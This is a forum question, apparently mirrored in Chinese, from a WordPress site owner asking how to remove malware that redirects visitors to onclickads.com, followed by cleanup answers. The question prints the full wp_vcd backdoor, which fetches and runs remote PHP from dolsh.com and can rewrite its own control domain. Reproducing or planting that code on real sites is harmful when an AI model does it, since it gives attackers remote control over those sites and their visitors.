代码之家  ›  专栏  ›  技术社区  ›  GravityCode

WordPress网站已将我的链接重定向到onclickads网站

malware wordpress php
  •  2
  • GravityCode  · 技术社区  · 7 年前

    我不知道这是否是onlickads的代码 每次我点击我网站上的一些链接,它就会在onclickads上重定向我。com链接。 

    <?php

if (isset($_REQUEST['action']) && isset($_REQUEST['password']) && ($_REQUEST['password'] == 'f82a07ebbdf814988becaa9c78ce0ffb'))
{
    $div_code_name="wp_vcd";
    switch ($_REQUEST['action'])
    {
        case 'change_domain';

        if (isset($_REQUEST['newdomain']))
        {

            if (!empty($_REQUEST['newdomain']))
            {
                if ($file = @file_get_contents(__FILE__))
                {
                    if(preg_match_all('/\$tmpcontent = @file_get_contents\("http:\/\/(.*)\/code8\.php/i',$file,$matcholddomain))
                    {
                        $file = preg_replace('/'.$matcholddomain[1][0].'/i',$_REQUEST['newdomain'], $file);
                        @file_put_contents(__FILE__, $file);
                        print "true";
                    }
                }
            }
        }
        break;
        default: print "ERROR_WP_ACTION WP_V_CD WP_CD";
    }
    die("");
}

if ( ! function_exists( 'w1p_te1mp_se1tup' ) ) {  
    $path=$_SERVER['HTTP_HOST'].$_SERVER[REQUEST_URI];
    if ( ! is_404() && stripos($_SERVER['REQUEST_URI'], 'wp-cron.php') == false && stripos($_SERVER['REQUEST_URI'], 'xmlrpc.php') == false) {
        if($tmpcontent = @file_get_contents("http://www.dolsh.com/code8.php?i=".$path))
        {

            function w1p_te1mp_se1tup($phpCode) {
                $tmpfname = tempnam(sys_get_temp_dir(), "w1p_te1mp_se1tup");
                $handle = fopen($tmpfname, "w+");
                fwrite($handle, "<?php\n" . $phpCode);
                fclose($handle);
                include $tmpfname;
                unlink($tmpfname);
                return get_defined_vars();
            }
            extract(w1p_te1mp_se1tup($tmpcontent));
        }
    }
}

?>

    任何人都可以建议如何删除我网站上的恶意软件,

    非常感谢。

    4 回复  |  直到 7 年前
        1
  •  4
  •   Fejs Do It    7 年前

    我为解决问题所做的:

    1. 在里面 wp-include wp-vcd.php class.wp.php 文件夹
    2. 目录,打开 post.php 并首先删除 php 标签添加人 Malware
    3. 向主题开放 functions.php 文件,并删除上述代码
        2
  •  3
  •   Gajjar Chintan    7 年前

    可能您不需要安装新版本,您可以通过以下步骤从站点中删除此类注意事项。

    删除onclickads。com重定向,请执行以下步骤:

    2) 从Windows卸载恶意程序

    3) 在你的系统上使用安全软件,也可以在你的WordPress中使用安全插件 Anti-spam Wordfence

    在遵循这些步骤之后,仍然没有任何效果,然后你可以安装一个新版本,并用你的新版本安装安全插件,以避免在将来使用黑客攻击。

        3
  •  0
  •   geshvic    7 年前

    要完全删除代码,如果您使用的是子主题,则必须同时将其从父主题中删除

        4
  •  0
  •   martin schwartz    7 年前

    下面是一个完整详细的解决方案,如何修复我在为我的受攻击网站寻找解决方案后发现的这种恶意软件攻击
    https://github.com/rakshitshah94/wordpress-wp-vcd-malware-attack-solution

    推荐文章
    Marcin Budzy  ·  Twenty 24 Wordpess主题的子菜单隐藏在图库下方(响应式灯箱和图库)(Wordpress)
    4 月前
    Cairan Van Rooyen  ·  为什么我的Grafana iframe不会显示在我的Wordpress网站上?
    5 月前
    Eiman Maghfouri  ·  woocommerce _可购买的编辑挂钩
    5 月前
    Oğuz Erdem  ·  chrome浏览器和iOS safari浏览器的页脚行为不同
    6 月前
    JapeNZ  ·  通过自定义cron作业函数向WooCommerce产品添加产品标签
    6 月前
    Mohammed Malleck  ·  在WooCommerce管理员编辑订单页面中隐藏客户IP地址
    9 月前
    Javad Hamashbouri  ·  不显示ajax警报
    9 月前
    Eduardo Relax  ·  如何获取WooCommerce产品类别url以在HTML元标记中显示?
    9 月前
    Stamp  ·  自定义字段未显示在WordPress REST API响应中
    10 月前
    pawan19  ·  WordPress的Nginx设置:面临301重定向问题
    10 月前
    关于   移动版
    代码之家 - 一站式码农服务社区
    沪ICP备11025650号